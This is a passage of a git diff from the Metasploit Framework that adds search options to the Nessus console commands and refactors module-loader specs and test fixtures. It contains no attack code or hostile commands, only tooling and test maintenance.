@n.scan_details(scan_id) if category == "info" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Status", "Policy", @@ -1214,6 +1312,7 @@ module Msf tbl << [ details["info"]["status"], details["info"]["policy"], details["info"]["name"], details["info"]["targets"], details["info"]["scan_start"], details["info"]["scan_end"] ] elsif category == "hosts" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -1227,6 +1326,7 @@ module Msf } elsif category == "vulnerabilities" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -1238,6 +1338,7 @@ module Msf } elsif category == "history" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "History ID", "Status", @@ -1319,27 +1420,31 @@ module Msf end def cmd_nessus_plugin_list(*args) - if args[0] == "-h" - print_status("nessus_plugin_list <Family ID>") - print_status("Example:> nessus_plugin_list 10") - print_status() - print_status("Returns a list of all plugins in that family.") - print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") - return + search_term = nil + family_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_list <Family ID> -S searchterm") + print_status("Example:> nessus_plugin_list 10") + print_status("Returns a list of all plugins in that family.") + print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + family_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 1 - family_id = args[0] - else + + if family_id.nil? print_status("Usage: ") print_status("nessus_plugin_list <Family ID>") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin ID', 'Plugin Name' @@ -1355,21 +1460,28 @@ module Msf end def cmd_nessus_family_list(*args) - if args[0] == "-h" - print_status("nessus_family_list") - print_status("Example:> nessus_family_list") - print_status() - print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_family_list") + print_status("Example:> nessus_family_list -S searchterm") + print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + list = @n.list_families tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', 'Number of Plugins' ]) - list.each { |family| + list['families'].each { |family| tbl << [ family["id"], family["name"], family["count"] ] } print_line @@ -1377,27 +1489,35 @@ module Msf end def cmd_nessus_plugin_details(*args) - if args[0] == "-h" - print_status("nessus_plugin_details <Plugin ID>") - print_status("Example:> nessus_plugin_details 10264") - print_status() - print_status("Returns details on a particular plugin.") - print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") - return + search_term = nil + plugin_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_details <Plugin ID>") + print_status("Example:> nessus_plugin_details 10264 -S searchterm") + print_status("Returns details on a particular plugin.") + print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + plugin_id = arg + end end + if !nessus_verify_token return end - case args.length - when 1 - plugin_id = args[0] - else + + if plugin_id.nil? print_status("Usage: ") print_status("nessus_plugin_details <Plugin ID>") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Reference', 'Value' @@ -1423,13 +1543,19 @@ module Msf end def cmd_nessus_user_list(*args) - if args[0] == "-h" - print_status("nessus_user_list") - print_status("Example:> nessus_user_list") - print_status() - print_status("Returns a list of the users on the Nessus server and their access level.") - return + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_user_list") + print_status("Example:> nessus_user_list -S searchterm") + print_status("Returns a list of the users on the Nessus server and their access level.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1438,6 +1564,7 @@ module Msf end list=@n.list_users tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'ID', 'Name', @@ -1493,7 +1620,6 @@ module Msf if args[0] == "-h" print_status("nessus_user_del <User ID>") print_status("Example:> nessus_user_del 10") - print_status() print_status("This command can only delete non admin users. You must be an admin to delete users.") print_status("Use nessus_user_list to list all users with their corresponding user IDs") return @@ -1574,13 +1700,19 @@ module Msf end def cmd_nessus_policy_list(*args) - if args[0] == "-h" - print_status("nessus_policy_list") - print_status("Example:> nessus_policy_list") - print_status() - print_status("Lists all policies on the server") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_policy_list") + print_status("Example:> nessus_policy_list -S searchterm") + print_status("Lists all policies on the server") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1607,7 +1739,6 @@ module Msf if args[0] == "-h" print_status("nessus_policy_del <policy ID>") print_status("Example:> nessus_policy_del 1") - print_status() print_status("You must be an admin to delete policies.") print_status("Use nessus_policy_list to list all policies with their corresponding policy IDs") return @@ -1642,31 +1773,6 @@ module Msf print_error("Unknown problem occured by deleting the user account having user ID #{user_id}.") end end - - def valid_policy(*args) - case args.length - when 1 - pid = args[0] - else - print_error("No Policy ID supplied.") - return - end - pol = @n.list_policies - pol["policies"].each { |p| - if p["template_uuid"] == pid - return true - end - } - return false - end - - def nessus_verify_db - if !(framework.db and framework.db.active) - print_error("No database has been configured, please use db_create/db_connect first") - return false - end - true - end end def initialize(framework, opts) diff --git a/spec/factories/mdm/module_details.rb b/spec/factories/mdm/module_details.rb index c67f200128..63fdb2276b 100644 --- a/spec/factories/mdm/module_details.rb +++ b/spec/factories/mdm/module_details.rb @@ -1,6 +1,6 @@ FactoryGirl.modify do factory :mdm_module_detail do - ignore do + transient do root { Metasploit::Framework.root } diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb new file mode 100644 index 0000000000..4296c95404 --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_tidy.rb @@ -0,0 +1,21 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Tidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end diff --git a/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb new file mode 100644 index 0000000000..0992ae4d3e --- /dev/null +++ b/spec/file_fixtures/modules/auxiliary/auxiliary_untidy.rb @@ -0,0 +1,24 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +# XXX: invalid super class for an auxiliary module +class MetasploitModule < Msf::Exploit + # XXX: auxiliary modules don't use Rank + Rank = LowRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Untidy Auxiliary Module for RSpec' + 'Description' => 'Test!' + }, + 'Author' => %w(Unknown), + 'License' => MSF_LICENSE, + ) + ) + end +end diff --git a/spec/file_fixtures/modules/payloads/payload_tidy.rb b/spec/file_fixtures/modules/payloads/payload_tidy.rb new file mode 100644 index 0000000000..a20c8dcea8 --- /dev/null +++ b/spec/file_fixtures/modules/payloads/payload_tidy.rb @@ -0,0 +1,17 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +module Metasploit + def initialize(info = {}) + super( + merge_info( + info, + 'Name' => 'Tidy Payload for RSpec', + 'Description' => 'Test!' + ) + ) + end +end diff --git a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb index a2aab3f53a..83deb96d6c 100644 --- a/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb +++ b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb @@ -1,4 +1,5 @@ require 'msf/core' +require 'spec_helper' RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do @@ -759,19 +760,6 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do describe 'when outputing' do - # Get stdout: - # http://stackoverflow.com/questions/11349270/test-output-to-command-line-with-rspec - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - before(:example) do allow(subject).to receive(:print_status) { |arg| $stdout.puts arg } allow(subject).to receive(:print_line) { |arg| $stdout.puts arg } @@ -873,4 +861,4 @@ RSpec.describe Msf::Exploit::Remote::BrowserAutopwn2 do end -end \ No newline at end of file +end diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 3e19e93fa7..d792b31f02 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -323,14 +323,12 @@ RSpec.describe Msf::Exploit::Powershell do end context 'when method is unknown' do - before do - subject.datastore['Powershell::method'] = 'blah' - end it 'should raise an exception' do except = false begin + subject.datastore['Powershell::method'] = 'blah' subject.cmd_psh_payload(payload, arch) - rescue RuntimeError + rescue Msf::OptionValidateError except = true end expect(except).to be_truthy diff --git a/spec/lib/msf/core/modules/loader/base_spec.rb b/spec/lib/msf/core/modules/loader/base_spec.rb index d85bbea547..ef058b2fed 100644 --- a/spec/lib/msf/core/modules/loader/base_spec.rb +++ b/spec/lib/msf/core/modules/loader/base_spec.rb @@ -12,7 +12,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:malformed_module_content) do <<-EOS - class Metasploit3 + class Metasploit # purposeful typo to check that module path is used in backtrace inclde Exploit::Remote::Tcp end @@ -21,7 +21,7 @@ RSpec.describe Msf::Modules::Loader::Base do let(:module_content) do <<-EOS - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary # fully-qualified name is Msf::GoodRanking, so this will failing if lexical scope is not captured Rank = GoodRanking end @@ -223,7 +223,7 @@ RSpec.describe Msf::Modules::Loader::Base do context 'instance methods' do let(:module_manager) do - double('Module Manager', :module_load_error_by_path => {}) + double('Module Manager', :module_load_error_by_path => {}, :module_load_warnings => {}) end subject do @@ -309,7 +309,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 < Msf::Auxiliary + class MetasploitModule < Msf::Auxiliary end end @@ -424,51 +424,12 @@ RSpec.describe Msf::Modules::Loader::Base do allow(error).to receive(:backtrace).and_return(backtrace) end - context 'with version compatibility' do - before(:example) do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - end - - it 'should record the load error using the original error' do - expect(subject).to receive(:load_error).with(module_path, error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - end - - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error using the Msf::Modules::VersionCompatibilityError' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end + it 'should record the load error using the original error' do + expect(subject).to receive(:load_error).with(module_path, error) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end it 'should return false' do - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey end end @@ -479,9 +440,13 @@ RSpec.describe Msf::Modules::Loader::Base do @namespace_module = double('Namespace Module') allow(@namespace_module).to receive(:parent_path=) allow(@namespace_module).to receive(:module_eval_with_lexical_scope).with(module_content, module_path) - - metasploit_class = double('Metasploit Class', :parent => @namespace_module) - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_defined?).with('MetasploitModule', false).and_return(true) + allow(@namespace_module).to receive(:const_get).with('Metasploit3', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('Metasploit4', false).and_return(false) + allow(@namespace_module).to receive(:const_get).with('MetasploitModule', false).and_return(true) + allow(@namespace_module).to receive(:module_load_warnings) allow(subject).to receive(:namespace_module_transaction).and_yield(@namespace_module) @@ -489,210 +454,83 @@ RSpec.describe Msf::Modules::Loader::Base do @module_load_error_by_path = {} allow(module_manager).to receive(:module_load_error_by_path).and_return(@module_load_error_by_path) + allow(module_manager).to receive(:on_module_load) + # remove the mocked namespace_module since happy-path/real loading is occurring in this context + allow(subject).to receive(:namespace_module_transaction).and_call_original end - it 'should check for version compatibility' do + it 'should log load information' do + expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do + original_load_error = "Back in my day this module didn't load" + module_manager.module_load_error_by_path[module_path] = original_load_error + + expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + expect(module_manager.module_load_error_by_path[module_path]).to be_nil + end + + it 'should return true' do + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy + end + + it 'should call module_manager.on_module_load' do expect(module_manager).to receive(:on_module_load) - - expect(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) - subject.load_module(parent_path, type, module_reference_name) + expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy end - context 'without version compatibility' do - let(:version_compatibility_error) do - Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => infinity, - :minimum_core_version => infinity - ) - end - - let(:infinity) do - 0.0 / 0.0 - end - - before(:example) do - allow(@namespace_module).to receive( - :version_compatible! - ).with( - module_path, - module_reference_name - ).and_raise( - version_compatibility_error - ) - end - - it 'should record the load error' do - expect(subject).to receive(:load_error).with(module_path, version_compatibility_error) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do + context 'with :recalculate_by_type' do + it 'should set the type to be recalculated' do + recalculate_by_type = {} + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :recalculate_by_type => recalculate_by_type + ) + ).to eq true + expect(recalculate_by_type[type]).to be_truthy end end - context 'with version compatibility' do - before(:example) do - allow(@namespace_module).to receive(:version_compatible!).with(module_path, module_reference_name) + context 'with :count_by_type' do + it 'should set the count to 1 if it does not exist' do + count_by_type = {} - allow(module_manager).to receive(:on_module_load) + expect(count_by_type.has_key?(type)).to be_falsey + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type + ) + ).to eq true + expect(count_by_type[type]).to eq 1 end - context 'without metasploit_class' do - let(:error) do - Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name + it 'should increment the count if it does exist' do + original_count = 1 + count_by_type = { + type => original_count + } + + expect( + subject.load_module( + parent_path, + type, + module_reference_name, + :count_by_type => count_by_type ) - end + ).to eq true - before(:example) do - expect(@namespace_module).to receive(:metasploit_class!).with(module_path, module_reference_name).and_raise(error) - end - - it 'should record load error' do - expect(subject).to receive( - :load_error - ).with( - module_path, - kind_of(Msf::Modules::MetasploitClassCompatibilityError) - ) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with metasploit_class' do - let(:metasploit_class) do - double('Metasploit Class') - end - - before(:example) do - allow(@namespace_module).to receive(:metasploit_class!).and_return(metasploit_class) - end - - it 'should check if it is usable' do - expect(subject).to receive(:usable?).with(metasploit_class).and_return(true) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'without usable metasploit_class' do - before(:example) do - expect(subject).to receive(:usable?).and_return(false) - end - - it 'should log information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_1) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should return false' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - end - - it 'should restore the old namespace module' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_falsey - expect(Msf::Modules.const_defined?(relative_name)).to be_truthy - expect(Msf::Modules.const_get(relative_name)).to eq @original_namespace_module - end - end - - context 'with usable metasploit_class' do - before(:example) do - # remove the mocked namespace_module since happy-path/real loading is occurring in this context - allow(subject).to receive(:namespace_module_transaction).and_call_original - end - - it 'should log load information' do - expect(subject).to receive(:ilog).with(/#{module_reference_name}/, 'core', LEV_2) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should delete any pre-existing load errors from module_manager.module_load_error_by_path' do - original_load_error = "Back in my day this module didn't load" - module_manager.module_load_error_by_path[module_path] = original_load_error - - expect(module_manager.module_load_error_by_path[module_path]).to eq original_load_error - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - expect(module_manager.module_load_error_by_path[module_path]).to be_nil - end - - it 'should return true' do - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - it 'should call module_manager.on_module_load' do - expect(module_manager).to receive(:on_module_load) - expect(subject.load_module(parent_path, type, module_reference_name)).to be_truthy - end - - context 'with :recalculate_by_type' do - it 'should set the type to be recalculated' do - recalculate_by_type = {} - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :recalculate_by_type => recalculate_by_type - ) - ).to eq true - expect(recalculate_by_type[type]).to be_truthy - end - end - - context 'with :count_by_type' do - it 'should set the count to 1 if it does not exist' do - count_by_type = {} - - expect(count_by_type.has_key?(type)).to be_falsey - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - expect(count_by_type[type]).to eq 1 - end - - it 'should increment the count if it does exist' do - original_count = 1 - count_by_type = { - type => original_count - } - - expect( - subject.load_module( - parent_path, - type, - module_reference_name, - :count_by_type => count_by_type - ) - ).to eq true - - incremented_count = original_count + 1 - expect(count_by_type[type]).to eq incremented_count - end - end - end + incremented_count = original_count + 1 + expect(count_by_type[type]).to eq incremented_count end end end @@ -944,7 +782,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod617578696c696172792f72737065632f6d6f636b - class Metasploit3 + class Metasploit end end @@ -978,7 +816,7 @@ RSpec.describe Msf::Modules::Loader::Base do expect(namespace_module).not_to eq @existent_namespace_module expect { - namespace_module::Metasploit3 + namespace_module::MetasploitModule }.to raise_error(NameError) true @@ -1239,7 +1077,7 @@ RSpec.describe Msf::Modules::Loader::Base do module Msf module Modules module Mod0 - class Metasploit3 + class Metasploit end end @@ -1339,50 +1177,5 @@ RSpec.describe Msf::Modules::Loader::Base do subject.send(:typed_path, type, module_reference_name) end end - - context '#usable?' do - context 'without metasploit_class responding to is_usable' do - it 'should return true' do - metasploit_class = double('Metasploit Class') - expect(metasploit_class).not_to respond_to(:is_usable) - - expect(subject.send(:usable?, metasploit_class)).to be_truthy - end - end - - context 'with metasploit_class responding to is_usable' do - it 'should delegate to metasploit_class.is_usable' do - # not a proper return, but guarantees that delegation is actually happening - usability = 'maybe' - metasploit_class = double('Metasploit Class', :is_usable => usability) - - expect(subject.send(:usable?, metasploit_class)).to eq usability - end - - context 'with error from metasploit_class.is_usable' do - let(:error) do - 'Expected error' - end - - let(:metasploit_class) do - metasploit_class = double('Metasploit Class') - - expect(metasploit_class).to receive(:is_usable).and_raise(error) - - metasploit_class - end - - it 'should log error' do - expect(subject).to receive(:elog).with(/#{error}/) - - subject.send(:usable?, metasploit_class) - end - - it 'should return false' do - expect(subject.send(:usable?, metasploit_class)).to be_falsey - end - end - end - end end end diff --git a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb b/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb deleted file mode 100644 index e4daf5f67c..0000000000 --- a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb +++ /dev/null @@ -1,8 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core/modules/metasploit_class_compatibility_error' - -RSpec.describe Msf::Modules::MetasploitClassCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' -end diff --git a/spec/lib/msf/core/modules/namespace_spec.rb b/spec/lib/msf/core/modules/namespace_spec.rb deleted file mode 100644 index 937920bdfd..0000000000 --- a/spec/lib/msf/core/modules/namespace_spec.rb +++ /dev/null @@ -1,268 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core' -require 'msf/core/modules/namespace' - -RSpec.describe Msf::Modules::Namespace do - let(:module_path) do - "parent/path/type_directory/#{module_reference_name}.rb" - end - - let(:module_reference_name) do - 'module/reference/name' - end - - subject do - mod = Module.new - mod.extend described_class - - mod - end - - context 'metasploit_class' do - before(:example) do - if major - subject.const_set("Metasploit#{major}", Class.new) - end - end - - context 'without Metasploit<n> constant defined' do - let(:major) do - nil - end - - it 'should not be defined' do - metasploit_constants = subject.constants.select { |constant| - constant.to_s =~ /Metasploit/ - } - - expect(metasploit_constants).to be_empty - end - end - - context 'with Metasploit1 constant defined' do - let(:major) do - 1 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit1')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit2 constant defined' do - let(:major) do - 2 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit2')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit3 constant defined' do - let(:major) do - 3 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit3')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit4 constant defined' do - let(:major) do - 4 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit4')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit5 constant defined' do - let(:major) do - 5 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit5')).to be_truthy - end - - it 'should be newer than Msf::Framework::Major' do - expect(major).to be > Msf::Framework::Major - end - - it 'should return nil' do - expect(subject.metasploit_class).to be_nil - end - end - end - - context 'metasploit_class!' do - it 'should call metasploit_class' do - expect(subject).to receive(:metasploit_class).and_return(Class.new) - - subject.metasploit_class!(module_path, module_reference_name) - end - - context 'with metasploit_class' do - let(:metasploit_class) do - Class.new - end - - before(:example) do - allow(subject).to receive(:metasploit_class).and_return(metasploit_class) - end - - it 'should return the metasploit_class' do - expect(subject.metasploit_class!(module_path, module_reference_name)).to eq metasploit_class - end - end - - context 'without metasploit_class' do - before(:example) do - allow(subject).to receive(:metasploit_class) - end - - it 'should raise a Msf::Modules::MetasploitClassCompatibilityError' do - expect { - subject.metasploit_class!(module_path, module_reference_name) - }.to raise_error(Msf::Modules::MetasploitClassCompatibilityError) - end - - context 'the Msf::Modules::MetasploitClassCompatibilityError' do - it 'should include the module path' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_path) - end - - it 'should include the module reference name' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_reference_name) - end - end - end - end - - context 'version_compatible!' do - context 'without RequiredVersions' do - it 'should not be defined' do - expect(subject.const_defined?('RequiredVersions')).to be_falsey - end - - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - - context 'with RequiredVersions defined' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 1 - end - - before(:example) do - subject.const_set( - :RequiredVersions, - [ - minimum_core_version, - minimum_api_version - ] - ) - end - - context 'with minimum Core version' do - it 'is <= Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be <= Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - end - - context 'without minimum Core version' do - let(:minimum_core_version) do - 5 - end - - it 'is > Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be > Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'is <= Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be <= Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - end - end - end -end diff --git a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb b/spec/lib/msf/core/modules/version_compatibility_error_spec.rb deleted file mode 100644 index 8e732966a3..0000000000 --- a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -RSpec.describe Msf::Modules::VersionCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 2 - end - - it 'should say cause was version check' do - expect(subject.to_s).to match(/due to version check/) - end - - context 'with :minimum_api_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version - ) - end - - it 'should set minimum_api_version' do - expect(subject.minimum_api_version).to eq minimum_api_version - end - - it 'should include minimum_api_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version}\)/) - end - end - - context 'with :minimum_api_version and :minimum_core_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - - it 'should include minimum_api_version and minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version} and Core >= #{minimum_core_version}\)/) - end - end - - context 'with :minimum_core_version' do - subject do - described_class.new( - :minimum_core_version => minimum_core_version - ) - end - - it 'should set minimum_core_version' do - expect(subject.minimum_core_version).to eq minimum_core_version - end - - it 'should include minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires Core >= #{minimum_core_version}\)/) - end - end - end -end diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb index 47ee28d2ec..9263da301e 100644 --- a/spec/lib/msf/db_manager_spec.rb +++ b/spec/lib/msf/db_manager_spec.rb @@ -52,5 +52,4 @@ RSpec.describe Msf::DBManager do it { is_expected.to respond_to :error } it { is_expected.to respond_to :initialize_database_support } it { is_expected.to respond_to :service_name_map } - it { is_expected.to respond_to :warn_about_rubies } end diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index 66a8edcde3..28605ad12b 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -340,6 +340,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " Amap Log", " Amap Log -m", " Appscan", + " Burp Issue XML", " Burp Session XML", " CI", " Foundstone", diff --git a/spec/lib/msf/util/document_generator/normalizer_spec.rb b/spec/lib/msf/util/document_generator/normalizer_spec.rb new file mode 100644 index 0000000000..c3a539aa8a --- /dev/null +++ b/spec/lib/msf/util/document_generator/normalizer_spec.rb @@ -0,0 +1,258 @@ +require 'rex' +require 'msf/util/document_generator' +require 'msf/util/document_generator/pull_request_finder' + +RSpec.describe Msf::Util::DocumentGenerator::DocumentNormalizer do + + let(:mod_description) { 'MS08-067 netapi double' } + let(:mod_authors) { [ 'sinn3r' ] } + let(:mod_fullname) { 'exploit/windows/smb/ms08_067_netapi' } + let(:mod_shortname) { 'ms08_067_netapi' } + let(:mod_name) { 'MS08-067' } + let(:mod_pull_requests) { 